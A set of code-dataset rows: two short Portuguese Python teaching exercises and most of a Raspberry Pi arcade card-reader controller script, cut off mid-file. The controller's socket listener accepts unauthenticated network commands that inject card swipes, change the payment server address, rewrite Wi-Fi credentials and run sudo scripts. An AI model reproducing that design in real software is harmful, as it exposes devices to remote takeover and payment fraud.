] | permissive | ggsant/pyladies | 1e5df8772fe772f8f7d0d254070383b9b9f09ec6 | 37e11e0c9dc2fa2263ed5b42df5a395169408766 | refs/heads/master | 2023-01-02T11:49:44.836957 | 2020-11-01T18:36:43 | 2020-11-01T18:36:43 | 306,947,105 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 766 | py | """
EXERCÍCIO 036: Aprovando Empréstimo
Escreva um programa para aprovar o empréstimo bancário para a compra de uma casa.
Pergunte o valor da casa, o salário do comprador e em quantos anos ele vai pagar.
A prestação mensal não pode exceder 30% do salário, ou então o empréstimo será negado.
"""
casa = float(input('Valor da casa: R$ '))
salario = float(input('Salário do comprador: R$ '))
anos = int(input('Quantos anos de financiamento? '))
prestacao = casa / (anos * 12)
minimo = salario * 30 / 100
print('Para pagar uma casa de R$ {:.2f} em {} anos,'.format(casa, anos), end=' ')
print('a prestação será de R$ {:.2f}.'.format(prestacao))
if prestacao <= minimo:
print('Empréstimo pode ser CONCEDIDO!')
else:
print('Empréstimo NEGADO!')
| [
"[email protected]"
] | |
3dc35cccc2f987013f4445f95435d2dad6a1f12b | 2834298c6a50ff7cfada61fb028b9fd3fc796e85 | /introd/programas/cap01_prob/exemp_cap_01_01_c.py | 3265df1f052c7c1bad508ee770a2d6ad52fb0fa4 | [] | no_license | ernestojfcosta/IPRP_LIVRO_2013_06 | 73841c45d000dee7fc898279d4b10d008c039fd0 | a7bb48745ad2fbfeb5bd4bc334cb7203d8f204a4 | refs/heads/master | 2021-01-22T05:00:57.868387 | 2013-06-07T11:00:55 | 2013-06-07T11:00:55 | 10,548,127 | 0 | 1 | null | null | null | null | WINDOWS-1257 | Python | false | false | 472 | py | # -*- coding: mac-roman -*-
# Exemplo simples entradas / sa’das / atribui¨›es
# Ernesto Costa
# Dada a altura calcula o peso ideal para uma pessoa
def main():
"""" Tem o peso ideal?
"""
# mensagem
altura = input("A sua altura por favor: ")
sexo = raw_input("O seu sexo por favor (M / F): ")
if sexo == 'M':
peso_ideal = 72.7 * altura - 58
else:
peso_ideal = 62.1 * altura - 44.7
print "O seu peso ideal e ", peso_ideal, "kilos"
main()
| [
"[email protected]"
] | |
91b36a0995b8185f836de8ef91377eae14007d36 | 295f34f4411d984f0ff6026be6e96fe134dc1550 | /home/pi/antes/cstart1.py | 31386346cd6c9ee0e187889c15981a991215e943 | [] | no_license | mcashjavier/disco-linux-raspy | 1e3fed914b6040fa9972e7cfc7357ecb72070e8c | 8c23103cf089059fbdadfad8cfb7059c1580da83 | refs/heads/master | 2022-12-20T17:06:39.967203 | 2019-03-12T12:09:22 | 2019-03-12T20:01:10 | 175,072,541 | 0 | 3 | null | 2022-12-18T06:59:27 | 2019-03-11T19:44:12 | null | UTF-8 | Python | false | false | 99,650 | py | #!/usr/bin/python3
import threading
#qr
import pyqrcode
from gpiozero import CPUTemperature
from tkinter import *
from tkinter.font import Font
import subprocess
import socket
import sys
import os
import json
import serial
import binascii
import pygame
import webbrowser
import io
from datetime import datetime,timedelta
import time
global tarjetalista
global controlluces
global rojo_dos_mundos
global UltTar
global infoObject
global screen
global acumulador
global SinNada
global EntrarTimer
global qcolor
global TimeOut
global llego1
global EnvioPuerto
global ConfirmacionCoin
global ConfirmacionTarjeta
global confirmacionMudo
global LabelPase
global LabelPagando
global LabelPago
#global sock
global MiIp
global MiMac
global PantallaPago
global confirmacion
global ctk
global tarjeta
global PagandoTk
global HTimeOut
global TerminoOperancion
global DosMundosc
global lcolor1
global lcolor2
global lcolor3
global xa
global jluces
global apb
global ColorVerde
global ColorRojo
global NumMaq
global IP
global PUERTO
global PV
global PN
NumMaq='XXXX'
IP='10.0.0.2'
PUERTO='5000'
MiIp='000.000.000.000'
MiMac='00:00:00:00:00:00'
LabelPase='SWIPE YOUR CARD'
LabelPagando='Paying Tks'
LabelPago='You Win'
PN='-'
PV='-'
confirmacionMudo=True
#sock.settimeout(1.0)
ConfirmacionTarjeta=False
tarjetalista=0
TerminoOperacion=1
PantallaPago=0
apb=0
jluces=0
xa=0
pygame.mixer.init()
SinNada=True
HTimeOut=datetime.now()
acumulador=''
qcolor=0
PagandoTk=False
TimeOut=False
tarjeta=''
DosMundosc=0
controlluces=0
#------Luces 2 mundos Def------
M1=[0x25,0X49,0x24,0X97,0x49,0x24,0x97]
M0=[0x26]
M2=[0x25,0x49,0x24,0x92,0xE9,0x24,0x97]
M3=[0x25,0x49,0x24,0x92,0x5D,0x24,0x97]
M4=[0x25,0x49,0x24,0x92,0x4B,0xA4,0x97]
M5=[0x25,0x49,0x24,0x92,0x49,0x74,0x97]
M6=[0x25,0x49,0x24,0x92,0x49,0x2E,0x97]
M7=[0x25,0x49,0x24,0x92,0x49,0x25,0xD7]
M8=[0x25,0x49,0x24,0x92,0x49,0x24,0xBF]
M9=[0x25,0x49,0x24,0x92,0x49,0x24,0x97]
M10=[0x25,0x49,0x24,0x97,0x49,0x24,0x92]
M11=[0x25,0x00,0x00,0x00,0x00,0x00,0x07]
rojo_dos_mundos=bytearray(M1)
rojo_dos_mundos1=bytearray(M2)
rojo_dos_mundos2=bytearray(M3)
rojo_dos_mundos3=bytearray(M4)
rojo_dos_mundos4=bytearray(M5)
rojo_dos_mundos5=bytearray(M6)
rojo_dos_mundos6=bytearray(M7)
rojo_dos_mundos7=bytearray(M8)
rojo_dos_mundos8=bytearray(M9)
rojo_dos_mundos9=bytearray(M10)
blanco_giro=bytearray(M11)
os.system('setterm -cursor off')
#------------------------------
#para qr 2018
def saveQRCodePNG(Nombre,Tam,Que):
try:
os.remove(Nombre+".png")
except:
b=1
fullfilename = "/home/pi/"+Nombre
objectQRCode = pyqrcode.create(Que)
with open(fullfilename + ".png", 'wb') as fstream:
objectQRCode.png(fstream, scale=Tam)
# same as above
objectQRCode.png(fullfilename + ".png", scale=Tam)
# in-memory stream is also supported
buffer = io.BytesIO()
objectQRCode.png(buffer)
# do whatever you want with buffer.getvalue()
print("Qr Creado Ok")
#
def listen():
global PN
global PV
global IP
global NumMaq
global tarjeta
global controlluces
global EnvioPuerto
global ConfirmacionTarjeta
global punto
WIFIN=''
WIFIP=''
try:
connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connection.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
connection.bind(("", 5001))
connection.listen(1)
print('abre listen')
# listen()
# return
cpu=CPUTemperature()
while True:
current_connection, address = connection.accept()
while True:
data = current_connection.recv(66)
if data:
#current_connection.send(data)
traje=data.decode('utf8')
print(traje)
EnvioNo=''
if traje[:3]=='300':
controlluces=0
EnvioPuerto=''
serie.flush()
time.sleep(0.100)
ConfirmacionTarjeta=False
while ConfirmacionTarjeta==False:
serie.write(bytes(activot))
time.sleep(0.100)
#tarjeta=traje[7:21]+'?'
print('llego 300 ' + str(tarjeta))
EnvioNo='103'
current_connection.send(EnvioNo.encode(encoding='UTF-8',errors='ignore'))
#time.sleep(0.8)
punto=1
tarjeta=traje[7:21]+'?'
if traje[:3]=='Num':
time.sleep(0.3)
NumMaq=traje[3:7]
EnvioNo='NumMaq Changed OK to '+str(NumMaq)
current_connection.send(EnvioNo.encode(encoding='UTF-8',errors='ignore'))
try:
os.remove('/home/pi/ControllerConfig/num.mc')
print('archivo num borrado ok')
file=open('num.mc','w')
file.write(NumMaq)
file.close()
print('archivo num creado ok')
except:
file=open('/home/pi/ControllerConfig/num.mc','w')
file.write(NumMaq)
file.close()
print('archivo num creado ok')
time.sleep(3.0)
if traje[:5]=='SSID:':
WIFIN=traje[5:]
EnvioNo='SSID OK \r\n'
current_connection.send(EnvioNo.encode(encoding='UTF-8',errors='ignore'))
if WIFIP=='':
EnvioNo='Enter password for network '+ str(WIFIN) + '\r\n'
current_connection.send(EnvioNo.encode(encoding='UTF-8',errors='ignore'))
if traje[:5]=='PASS:':
if WIFIN=='':
EnvioNo='Write a valid SSID Network before Password \r\n'
current_connection.send(EnvioNo.encode(encoding='UTF-8',errors='ignore'))
break
WIFIP=traje[5:]
EnvioNo='Password for '+ str(WIFIN) +' OK \r\n'
current_connection.send(EnvioNo.encode(encoding='UTF-8',errors='ignore'))
try:
file=open("/home/pi/ControllerConfig/red.mc",'w')
file.write('ctrl_interface=DIR=/var/run/wpa_supplicant GROUP=netdev\r\n')
file.write('update_config=1\r\n')
file.write('country=AR\r\n')
file.write('\r\n')
file.write('network={\r\n')
file.write(' ssid="'+ str(WIFIN) +'"\r\n')
file.write(' psk="'+ str(WIFIP) +'"\r\n')
file.write(' key_mgmt=WPA-PSK\r\n')
file.write('}')
file.close()
except:
EnvioNo='Error to configure Wifi Network, please press reset button ... \r\n'
current_connection.send(EnvioNo.encode(encoding='UTF-8',errors='ignore'))
break
while os.path.getsize("/home/pi/ControllerConfig/red.mc")==0:
time.sleep(0.5)
print('esperando q se guarde')
EnvioNo='Please Wait, Restarting Controller ... \r\n'
current_connection.send(EnvioNo.encode(encoding='UTF-8',errors='ignore'))
time.sleep(1.5)
#ejecuta comando de configuracion wifi - Eze.C 2018
try:
os.remove("hotspoton.mc")
except:
b=1
os.system("sudo python3 /home/pi/ControllerConfig/configw.py -f")
if traje[:3]=='log':
EnvioNo='Controller: My Mac is '+str(MiMac)+ '\r\n'
current_connection.send(EnvioNo.encode(encoding='UTF-8',errors='ignore'))
EnvioNo='Controller: My Ip is '+str(MiIp)+ '\r\n'
current_connection.send(EnvioNo.encode(encoding='UTF-8',errors='ignore'))
EnvioNo='Controller: My Temperature is '+str(cpu.temperature)+ '\r\n'
current_connection.send(EnvioNo.encode(encoding='UTF-8',errors='ignore'))
EnvioNo='Controller: Master Ip is '+str(IP)+ '\r\n'
current_connection.send(EnvioNo.encode(encoding='UTF-8',errors='ignore'))
EnvioNo='Controller: MaqNumber is '+str(NumMaq)+ '\r\n'
current_connection.send(EnvioNo.encode(encoding='UTF-8',errors='ignore'))
EnvioNo='Controller: Normal Price is '+str(PN)+ '\r\n'
current_connection.send(EnvioNo.encode(encoding='UTF-8',errors='ignore'))
EnvioNo='Controller: Vip Price is '+str(PV)+ '\r\n'
current_connection.send(EnvioNo.encode(encoding='UTF-8',errors='ignore'))
#time.sleep(10.0)
#return
elif traje[:8]=='masterip':
EnvioNo='Controller: Master Ip is '+str(IP)+ '\r\n'
current_connection.send(EnvioNo.encode(encoding='UTF-8',errors='ignore'))
#IP=traje[6:]
#print(str(IP))
#EnvioNo='Controller: Master IP Changed OK to '+str(IP)
#current_connection.send(EnvioNo.encode(encoding='UTF-8',errors='ignore'))
time.sleep(5.0)
#return
elif traje[:6]=='master':
EnvioNo='Controller: Prev Ip '+str(IP)+ '\r\n'
current_connection.send(EnvioNo.encode(encoding='UTF-8',errors='ignore'))
IP=traje[6:]
print(str(IP))
EnvioNo='Controller: Master IP Changed OK to '+str(IP) + '\r\n'
current_connection.send(EnvioNo.encode(encoding='UTF-8',errors='ignore'))
time.sleep(5.0)
#return
elif traje[:4]=='wifi':
EnvioNo='Preparando Conexion Wifi...'
current_connection.send(EnvioNo.encode(encoding='UTF-8',errors='ignore'))
os.system("sudo python3 /home/pi/ControllerConfig/configw.py -f")
#current_connection.close()
elif traje[:7]=='hotspot':
EnvioNo='Preparando Hotspot Wifi...'
current_connection.send(EnvioNo.encode(encoding='UTF-8',errors='ignore'))
file=open("hotspoton.mc","w")
file.close()
os.system("sudo python3 /home/pi/ControllerConfig/configh.py -f")
#current_connection.close()
elif traje[0:17]==MiMac:
print('entro')
NumMaq=traje[21:25]
PN=traje[25:32]
PV=traje[32:39]
PantFull()
EnvioNo='103'
current_connection.send(EnvioNo.encode(encoding='UTF-8',errors='ignore'))
else:
EnvioNo=str(ObtenerMac('wlan0'))
current_connection.send(EnvioNo.encode(encoding='UTF-8',errors='ignore'))
time.sleep(3.00)
if EnvioNo!='':
current_connection.close()
break
except:
print('NO abre listen')
def ObtenerMac(interface='eth0'):
global MiIp
global MiMac
# Return the MAC address of the specified interface
try:
str = open('/sys/class/net/%s/address' %interface).read()
gw = os.popen("ip -4 route show default").read().split()
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect((gw[2], 0))
ipaddr = s.getsockname()[0]
MiIp=ipaddr
gateway = gw[2]
host = socket.gethostname()
MiMac=str[0:17]
msj=subprocess.check_output("hostname -I",shell=True).decode('utf8')
MiIp=msj.strip()
return MiIp#str[0:17]+ ','+ ipaddr + ','+ NumMaq
except:
msj=subprocess.check_output("hostname -I",shell=True).decode('utf8')
MiIp=msj.strip()
str = "00:00:00:00:00:00"
return 'NO'#str[0:17]+ ','+ ipaddr + ','+ NumMaq
def Debitar():
global tarjeta
global NumMaq
global balance
global EnvioPuerto
global UltTar
global controlluces
global tarjetalista
global TerminoOperacion
global confirmacion
global ConfirmacionCoin
global ConfirmacionTarjeta
global LabelPase
global LabelPagando
global LabelPago
global confirmacionMudo
ConfirmacionCoin=0
ConfirmacionTarjeta=False
print('llego con tarjeta '+str(tarjeta))
if tarjeta !='':# and TerminoOperacion==1:
#print(tarjeta)
tarjeta2018=tarjeta
print(tarjeta2018)
balance=''
try:
# Create a TCP/IP socket
print('previo a conectar')
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_address = (str(IP),5000)#192.168.2.50 -- IAAPA
print('connecting to %s port %s' % server_address)
sock.settimeout(5.0)
sock.connect(server_address)
message = MiMac+','+MiIp+','+NumMaq +'*'+tarjeta2018[:-1] + str(PN) + str(PV) + '99' #tarjeta.get() #'C;1921000005618'
# Connect the socket to the port where the server is listening
print('paso conexion')
# Send data
#message = NumMaq +'*'+tarjeta[:-1] + '1.00 1.00 99' #tarjeta.get() #'C;1921000005618'
#print('sending "%s"' % message)
#sock.settimeout(1.0)
sock.sendall(message.encode(encoding='UTF-8',errors='ignore'))
# Look for the response
#amount_received = 0
#amount_expected = 1#len(message)
data1=''
data=''
#yat=datetime.now()
#hastat=datetime.now()+timedelta(milliseconds=2000)
#amount_received < amount_expected and
print('antes de leer')
while data=='':#hastat > yat and data=='':
data = sock.recv(48)
#print(data)
#amount_received += len(data)
#encoded
#data_string = json.dumps(data.decode('utf8'))
#Decoded
#decoded = json.loads("{'credito': '75.1'}")
print('leyo')
data1=data.decode('utf8')
print(str(data1))
print("paseeee----")
#sock.close()
##print(data1.lstrip("{"))
if len(data1)<46:
#Saldo.config(text ="New card")
#bonus.config(text ="")
#tk.config(text ="")
balance='Invalid Transaction'
screen.fill((0,0,0))
pygame.font.init
myfont =pygame.font.Font("super.ttf",35)
bg = pygame.image.load("fondot.jpg")
screen.blit(bg,(0,0))
esto=balance#data#str(tarjeta)+str(' Ok')
#label = myfont.render(esto, 1, (0,255,20))
#screen.blit(label, (((infoObject.current_w - label.get_width()) / 2), ((infoObject.current_h - label.get_height()) / 2)))
label = myfont.render("Network Error", 1, (0,255,20))
screen.blit(label,(((infoObject.current_w - label.get_width()) / 2), ((infoObject.current_h - label.get_height()) / 2)-40))
myfont =pygame.font.Font("super.ttf",25)
label1 = myfont.render(esto, 1, (0,255,20))
screen.blit(label1,(((infoObject.current_w - label1.get_width()) / 2), ((infoObject.current_h - label.get_height()) / 2)+40))
pygame.display.flip()
pygame.display.update()
luz2017('rojo')
time.sleep(1)
#break
elif data1[1:2]=='0':#data1=='sin' or data1=='SIN':
#Saldo.config(text ="New card")
#bonus.config(text ="")
#tk.config(text ="")
print("Entro a sin saldo")
#while tarjetalista==0:
# b=1
#balance='[Recharge for Play Again]'
screen.fill((0,0,0))
pygame.font.init
myfont =pygame.font.Font("super.ttf",35)
bg = pygame.image.load("fondot.jpg")
screen.blit(bg,(0,0))
balance=data1[14:-2].lstrip()
print(data1)
esto=balance#data#str(tarjeta)+str(' Ok')
esto1=balance#[2:].lstrip()
esto1=esto1.rstrip()
print(esto1)
#label = myfont.render(esto, 1, (0,255,20))
#screen.blit(label, (((infoObject.current_w - label.get_width()) / 2), ((infoObject.current_h - label.get_height()) / 2)))
if esto1[:5]=='Saldo':# or esto[1:6]=='Saldo':
LabelPase='Pase Su Tarjeta'
LabelPagando='Pagando Tks'
LabelPago='Ganaste!!!'
else:
LabelPase='Swipe Your Card'
LabelPagando='Paying Tks'
LabelPago='You Win!!!'
print(esto+' Eze')
if esto1[:5]=='Saldo':# or esto[1:6]=='Saldo':
label = myfont.render("SIN SALDO ", 1, (255,255,255))
linea1=esto[:16].lstrip()
linea2=esto[16:].lstrip()
elif esto[:2]=='Su':
label = myfont.render("SIN SALDO ", 1, (255,255,255))
linea1=esto[:15].lstrip()
linea2=esto[15:].lstrip()
else:
label = myfont.render("NO BALANCE ", 1, (255,255,255))
linea1=esto[:16].lstrip()
linea2=esto[16:].lstrip()
linea3='Tickets: '+ str(int(data1[10:14]))
#if len(linea1)<20:
# while len(linea1)<20:
# linea1=linea1 + ' '
if len(linea2)<len(linea1):
while len(linea2)<len(linea1):
linea2=linea2 + ' '
if len(linea3)<len(linea1):
while len(linea3)<len(linea1):
linea3=linea3 + ' '
#pygame.event.wait()
#while pygame.mixer.music.get_busy():
#print("Playing...")
#time.sleep(500)
screen.blit(label,(((infoObject.current_w - label.get_width()) / 2), ((infoObject.current_h - label.get_height()) / 2)-115))
myfont =pygame.font.Font("super.ttf",30)
label1 = myfont.render(linea1, 1, (0,255,0))
screen.blit(label1,(((infoObject.current_w - label1.get_width()) / 2), ((infoObject.current_h - label.get_height()) / 2)-30))
myfont =pygame.font.Font("super.ttf",30)
label1 = myfont.render(linea2, 1, (0,255,0))
screen.blit(label1,(((infoObject.current_w - label1.get_width()) / 2), ((infoObject.current_h - label.get_height()) / 2)+15))
#print(esto[1:3])
if esto[:2]=='Su':
LabelPase='Pase Su Tarjeta'
LabelPagando='Pagando Tks'
LabelPago='Ganaste!!!'
else:
LabelPase='Swipe Your Card'
LabelPagando='Paying Tks'
LabelPago='You Win !!!'
if esto[:4].lstrip() !='Card' and esto[:2].lstrip()!='Su' and esto[:3]!='Hay' and esto[:7].lstrip()!='Tarjeta':
myfont =pygame.font.Font("super.ttf",30)
label2 = myfont.render(linea3, 1, (0,255,0))
screen.blit(label2,(((infoObject.current_w - label1.get_width()) / 2), ((infoObject.current_h - label.get_height()) / 2)+60))
pygame.display.flip()
pygame.display.update()
#while EnvioPuerto!='':
# b=1
#luz2017('rojo')
#ColorRojo
serie.flush()
EnvioPuerto=''
#time.sleep(.200)
EnvioPuerto=''
#while tarjetalista==0:
# b=1
#serie.write(bytes(bytearray([0x25,0x49,0x24,0x92,0x49,0x24,0x97])))
#tarjetalista=0
#serie.flush()
#EnvioPuerto=''#ColorRojo
#serie.flushOutput()
#sock.sendall(str(ColorRojo))
#time.sleep(.200)
if len(data1)>46:
#sock.connect(server_address)
balance=data1
mok='103'
sock.sendall(mok.encode(encoding='UTF-8',errors='ignore'))
#confirmacion=False
confirmacionMudo=False
while confirmacionMudo==False:
serie.flush()
serie.write(bytes([0x3C]))
time.sleep(0.150)
#pygame.mixer.music.load('/home/pi/Desktop/rojo.mp3')
#pygame.mixer.music.play()
controlluces=0
while controlluces==0:
serie.write(bytes(ColorRojo))
time.sleep(1.100)
#time.sleep(1)
#os.system("omxplayer -b /home/pi/Desktop/rojo.mp3")
#time.sleep(1.00)
#while confirmacion==False:
# b=1
#tarjetalista=0
elif data1[1:2]=='1':#len(data1)>10:
UltTar=tarjeta2018
print("Entro con saldo")
ee=bytearray()
ee.append(0x2A)
ee.append(0x92)
ee.append(0x49)
ee.append(0x24)
ee.append(0x92)
ee.append(0x49)
ee.append(0x27)
serie.flush()
EnvioPuerto=''
#while tarjetalista==0:
# print('esperando tarjetalista')
# b=1
print('ya')
print(data1)
balance=data1[14:-2].lstrip()
print(balance)
screen.fill((0,0,0))
pygame.font.init
myfont =pygame.font.Font("super.ttf",35)
bg = pygame.image.load("fondot.jpg")
screen.blit(bg,(0,0))
esto=balance#data#str(tarjeta)+str(' Ok')
#label = myfont.render(esto, 1, (0,255,20))
#screen.blit(label, (((infoObject.current_w - label.get_width()) / 2), ((infoObject.current_h - label.get_height()) / 2)))
#print(esto[1:6])
if esto[:5]=='Saldo':# or esto[1:6]=='Saldo':
LabelPase='Pase Su Tarjeta'
LabelPagando='Pagando Tks'
LabelPago='Ganaste!!!'
else:
LabelPase='Swipe Your Card'
LabelPagando='Paying Tks'
LabelPago='You Win!!!'
#print(str(esto[2:7]))
if esto[:5]=='Saldo':# or esto[1:6]=='Saldo':
label = myfont.render("JUEGUE!!! ", 1, (255,255,255))
else:
label = myfont.render("PLAYER OK ", 1, (255,255,255))
linea1=esto[:16].lstrip()
linea2=esto[16:].lstrip()
linea3='Tickets: '+ str(int(data1[10:14]))
#if len(linea1)<20:
# while len(linea1)<20:
# linea1=linea1 + ' '
if len(linea2)<len(linea1):
while len(linea2)<len(linea1):
linea2=linea2 + ' '
if len(linea3)<len(linea1):
while len(linea3)<len(linea1):
linea3=linea3 + ' '
#time.sleep(300)
#clock.tick(100)
#confirmacionMudo=False
#while confirmacionMudo==False:
serie.flush()
#serie.write(bytes([0x3A]))
#time.sleep(0.100)
screen.blit(label,(((infoObject.current_w - label.get_width()) / 2), ((infoObject.current_h - label.get_height()) / 2)-115))
myfont =pygame.font.Font("super.ttf",30)
label1 = myfont.render(linea1, 1, (0,255,0))
screen.blit(label1,(((infoObject.current_w - label1.get_width()) / 2), ((infoObject.current_h - label.get_height()) / 2)-30))
myfont =pygame.font.Font("super.ttf",30)
label1 = myfont.render(linea2, 1, (0,255,0))
screen.blit(label1,(((infoObject.current_w - label1.get_width()) / 2), ((infoObject.current_h - label.get_height()) / 2)+15))
myfont =pygame.font.Font("super.ttf",30)
label2 = myfont.render(linea3, 1, (0,255,0))
screen.blit(label2,(((infoObject.current_w - label1.get_width()) / 2), ((infoObject.current_h - label.get_height()) / 2)+60))
pygame.display.flip()
pygame.display.update()
#time.sleep(.030)
#time.sleep(1)
#luz2017('verde')
#while EnvioPuerto!='':
# b=1
#confirmacion=True
#EnviarPuerto=ee
confirmacionMudo=False
while confirmacionMudo==False:
serie.flush()
serie.write(bytes([0x3C]))
time.sleep(0.100)
#pygame.mixer.music.load('/home/pi/Desktop/verde1.mp3')
#pygame.mixer.music.play()
print("Playing...")
if len(data1)>46:
#sock.connect(server_address)
mok='103'
sock.sendall(mok.encode(encoding='UTF-8',errors='ignore'))
ConfirmacionCoin=0
while ConfirmacionCoin==0:
print("EnviandoCoin")
serie.write(bytes(ee))
time.sleep(1.1)
#os.system("omxplayer -b /home/pi/Desktop/verde1.mp3")
#time.sleep(1)
balance=data1
tarjetalista=0
time.sleep(0.1)
##print(python_obj[4]["credito"])
##print(python_obj[5]["bonus"])
##print(python_obj[6]["tk"])
#pets = set(data_string)
##print(json.dumps(pets, default=jdefault))
#esto=decoded
#print ("Tenemos "+ decoded["credito"])
#esto=json.dumps(data_string, default=jdefault)#str(decoded['credito'])
##print('received "%s"' % esto)
# Saldo.text=
except:
print('error al conectar')
serie.write(bytearray(bytes([0x25,0x6D,0xB6,0xDB,0x6D,0xB6,0xDF])))
balance='Network Error'
screen.fill((0,0,0))
pygame.font.init
myfont =pygame.font.Font("super.ttf",35)
bg = pygame.image.load("fondot.jpg")
screen.blit(bg,(0,0))
esto=balance#data#str(tarjeta)+str(' Ok')
#label = myfont.render(esto, 1, (0,255,20))
#screen.blit(label, (((infoObject.current_w - label.get_width()) / 2), ((infoObject.current_h - label.get_height()) / 2)))
label = myfont.render("Network Error", 1, (0,255,20))
screen.blit(label,(((infoObject.current_w - label.get_width()) / 2), ((infoObject.current_h - label.get_height()) / 2)-40))
myfont =pygame.font.Font("super.ttf",25)
label1 = myfont.render(esto, 1, (0,255,20))
screen.blit(label1,(((infoObject.current_w - label1.get_width()) / 2), ((infoObject.current_h - label.get_height()) / 2)+40))
pygame.display.flip()
pygame.display.update()
#luz2017('rojo')
time.sleep(1)
#sock.close()
#Debitar()
#return
b=1
finally:
#tarjeta=''
#punto=0
print('closing socket')
sock.close()
time.sleep(1.0)
#EnvioPuerto=activot
#TerminoOperacion=1
PantFull()
EnvioPuerto=''
serie.flush()
time.sleep(0.100)
ConfirmacionTarjeta=False
while ConfirmacionTarjeta==False:
serie.write(bytes(activot))
time.sleep(0.100)
#EnvioPuerto=''
#serie.flush()
#while confirmacion==False:
#time.sleep(0.010)
#controlluces=0
#while controlluces==0:
#serie.write(bytearray([0x25,0x09,0x00,0x09,0x00,0x49,0xF8]))#bytearray([0x28,0x10,0x11,0x01,0x02,0x05,0x09])#bytes(a)
#time.sleep(1.00)
#time.sleep(1.00)
#serie.flush()#Ouput()
#time.sleep(1)
#serie.flush()#Ouput()
#time.sleep(.030)
#serie.write(bytes(activot))
#time.sleep(.020)
tarjetalista=0
haytarjeta=0
punto=0
controlluces=1
TerminoOperacion=1
confirmacionMudo=False
while confirmacionMudo==False:
serie.flush()
serie.write(bytes([0x3A]))
time.sleep(0.150)
print("termino")
#serie.flush()
#confirmacion=False
#serie.write(bytes(activot))
#while confirmacion==False:
# b=1
#luz2017('paseo')
#time.sleep(1)
#time.sleep(0.030)
#while EnvioPuerto!='':
# b=1
#EnvioPuerto=bytearray([0x24,0x00,0x00,0x00,0x00,0x00,0x00])#bytes(a)
#EnvioPuerto=bytearray([0x24,0x00,0x00,0x00,0x00,0x00,0x00])#bytes(a)
#serie.write(EnvioPuerto1)
#'else:
#' Saldo.config(text = 'Sin tarjeta...')
def DosMundos():
global confirmacion
global DosMundosc
print('entro dos mundos '+str(controlluces))
#if len(tarjeta)==0:
if DosMundosc==0 and controlluces==1:
serie.write(bytes(rojo_dos_mundos))
DosMundosc=1
return
#confirmacion=False
if DosMundosc==1 and controlluces==1:
serie.write(bytes(rojo_dos_mundos1))
DosMundosc=2
return
#confirmacion=False
if DosMundosc==2 and controlluces==1:
serie.write(bytes(rojo_dos_mundos2))
DosMundosc=3
return
#confirmacion=False
if DosMundosc==3 and controlluces==1:
serie.write(bytes(rojo_dos_mundos3))
DosMundosc=4
return
#confirmacion=False
if DosMundosc==4 and controlluces==1:
serie.write(bytes(rojo_dos_mundos4))
DosMundosc=5
return
#confirmacion=False
if DosMundosc==5 and controlluces==1:
serie.write(bytes(rojo_dos_mundos5))
DosMundosc=6
return
#confirmacion=False
if DosMundosc==6 and controlluces==1:
serie.write(bytes(rojo_dos_mundos6))
DosMundosc=7
return
#confirmacion=False
if DosMundosc==7 and controlluces==1:
serie.write(bytes(rojo_dos_mundos7))
DosMundosc=8
return
#confirmacion=False
if DosMundosc==8 and controlluces==1:
serie.write(bytes(rojo_dos_mundos8))
DosMundosc=9
return
#confirmacion=False
if DosMundosc==9 and controlluces==1:
serie.write(bytes(rojo_dos_mundos9))
DosMundosc=10
return
#confirmacion=False
if DosMundosc==10 and controlluces==1:
serie.write(bytes(blanco_giro))
DosMundosc=0
return
#confirmacion=False
def inicio():
global confirmacion
global ctk
global tarjeta
global PagandoTk
global TimeOut
global EnvioPuerto
global punto
global ColorVerde
global ColorRojo
global UltTar
TimeOut=False
PagandoT=False
tarjeta=''
ctk=0
xa=0
punto=0
confirmacion=True
global llego1
llego1=''
EnvioPuerto=''
UltTar=''
pygame.init()
pygame.font.init()
ColorVerde=bytearray()#[0x25,0x92,0x49,0x24,0x92,0x49,0x27])#bytes(a)
ColorVerde.append(0x25)
ColorVerde.append(0x92)
ColorVerde.append(0x49)
ColorVerde.append(0x24)
ColorVerde.append(0x92)
ColorVerde.append(0x49)
ColorVerde.append(0x27)
ColorRojo=bytearray()#([0x25,0x49,0x24,0x92,0x49,0x24,0x97])#bytes(a)
ColorRojo.append(0x25)
ColorRojo.append(0x49)
ColorRojo.append(0x24)
ColorRojo.append(0x92)
ColorRojo.append(0x49)
ColorRojo.append(0x24)
ColorRojo.append(0x97)
inicio()
def TiempoTk():
global ctk
global TimeOut
global EntrarTimer
#global HTimeOut
global Ahora
global EnvioPuerto
EntrarTimer=False
TimeOut=False
while True:
#if int(ctk)>0:
###print(PagandoTk)
###print(ctk)
###print(SinNada)
#Ahora=datetime.now()
if PagandoTk==False and int(ctk)>0:
Ahora=datetime.now()
#if TimeOut==False:
# TimeOut=False
if Ahora >= HTimeOut and TimeOut==False:
if PagandoTk==False and int(ctk)>0:
TimeOut=True
####print('Termino tiempo de Tk')
####print('Envia Tks')
####print(ctk)
#if confirmacion==True:
# serie.write(activot)
#while len(EnvioPuerto)>0:
# a=1
#while EnvioPuerto!='':
# b=1
#EnvioPuerto=activot
#if Ahora < HTimeOut:
# Timeout=False
def resize_image(event):
new_width = event.width
new_height = event.height
image = copy_of_image.resize((new_width, new_height))
photo = ImageTk.PhotoImage(image)
label.config(image = photo)
label.image = photo #avoid garbage collection
def cargo():
#global confirmacion
global termineConsulta
global estatarjeta
termineConsulta=False
estatarjeta=False
confirmacion=True
#[0x29,0x10]->pago lento
#[0x29,0x22]->pago rapido
serie = serial.Serial('/dev/serial0', 9600, timeout=0.2, writeTimeout=0)
#seriet = serial.Serial('/dev/serial0', 9600, timeout=0.2, writeTimeout=0)
activot=bytearray()#([0x26])#,0x00,0x00,0x00,0x00,0x00,0x00])
activot.append(0x26)
#activot.append(0x00)
#activot.append(0x00)
#activot.append(0x00)
#activot.append(0x00)
#activot.append(0x00)
#activot.append(0x00)
desactivot=bytearray()#([0x27])#,0x00,0x00,0x00,0x00,0x00,0x00])
desactivot.append(0x27)
#desactivot.append(0x00)
#desactivot.append(0x00)
#desactivot.append(0x00)
#desactivot.append(0x00)
#desactivot.append(0x00)
#desactivot.append(0x00)
pcorto=bytearray()#[0x29,0x10])#,0x00,0x00,0x00,0x00,0x00])#pago rapido-coin rapido
pcorto.append(0x29)
pcorto.append(0x10)
serie.write(pcorto)
serie.flushOutput()
time.sleep(1)
pcorto1=bytearray()#[0x30,0x01,0x35])#,0x00,0x00,0x00,0x00]) #habilita pago
